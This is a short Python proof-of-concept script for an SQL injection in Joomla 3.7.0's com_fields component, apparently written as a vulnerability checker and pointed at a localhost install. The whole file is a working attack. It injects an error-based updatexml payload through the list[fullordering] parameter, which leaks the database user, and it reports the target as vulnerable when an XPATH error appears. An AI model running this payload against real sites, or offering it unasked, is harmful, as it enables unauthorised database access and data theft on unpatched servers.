# coding: utf-8

import requests

def poc(target):
    
    url = target+"index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)"

    r = requests.get(url)

    # print r.text
    if 'XPATH syntax error:' in r.text:
        print '[!] {} is vul. '.format(target)
        return True

if __name__ == '__main__':
    poc('http://localhost/joomla/Joomla_3.7.0-Stable-Full_Package/')